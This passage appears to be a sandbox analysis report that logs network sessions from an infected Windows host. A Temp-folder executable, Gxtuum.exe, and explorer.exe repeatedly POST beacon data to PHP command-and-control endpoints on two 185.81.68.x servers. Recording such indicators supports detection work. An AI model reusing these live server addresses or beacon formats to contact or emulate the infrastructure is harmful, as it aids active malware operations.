                                                                                                                                                                                                124192.168.2.1150097185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:06.604017019 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:21:06.729007006 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:21:08.069358110 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:07 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                125192.168.2.1150098185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:08.305303097 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:21:08.425048113 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:21:09.905309916 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:08 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                126192.168.2.1150099185.81.68.148803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:09.362879038 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:21:10.691335917 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:09 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                127192.168.2.1150100185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:09.510809898 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:21:10.846005917 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:10 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                128192.168.2.1150101185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:10.161757946 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:21:10.281728029 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:21:11.756026983 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:10 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                129192.168.2.1150102185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:11.992013931 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:21:12.112685919 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:21:13.452770948 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:12 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                130192.168.2.1150103185.81.68.148803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:12.404058933 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                                                                                                                                                                                                Dec 13, 2024 08:21:13.721525908 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:13 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                131192.168.2.1150104185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:12.589831114 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                                                                                                                                                                                                Dec 13, 2024 08:21:13.940124989 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:13 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                132192.168.2.1150105185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:13.695801973 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:21:13.815845013 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:21:15.210714102 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:14 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                133192.168.2.1150106185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:15.445481062 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:21:15.565365076 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:21:16.921998978 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:16 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                134192.168.2.1150107185.81.68.148803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:15.618622065 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:21:16.939085960 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:16 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                135192.168.2.1150108185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:16.005428076 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:21:17.144870043 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:16 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                136192.168.2.1150109185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:17.148087025 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:21:17.268022060 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:21:18.605263948 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:17 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                137192.168.2.1150111185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:18.883739948 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:21:19.003609896 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:21:20.321099043 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:19 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                138192.168.2.1150110185.81.68.148803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:19.222071886 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                                                                                                                                                                                                Dec 13, 2024 08:21:20.018685102 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:19 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                139192.168.2.1150112185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:19.345832109 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                                                                                                                                                                                                Dec 13, 2024 08:21:20.705713987 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:19 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                140192.168.2.1150113185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:20.554953098 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:21:20.674956083 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:21:22.153484106 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:21 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                141192.168.2.1150114185.81.68.148803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:22.335344076 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:21:23.663537979 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:22 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                142192.168.2.1150115185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:22.382510900 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:21:22.502351046 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:21:23.837435007 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:23 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                143192.168.2.1150116185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:22.501132965 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:21:23.830214024 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:23 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


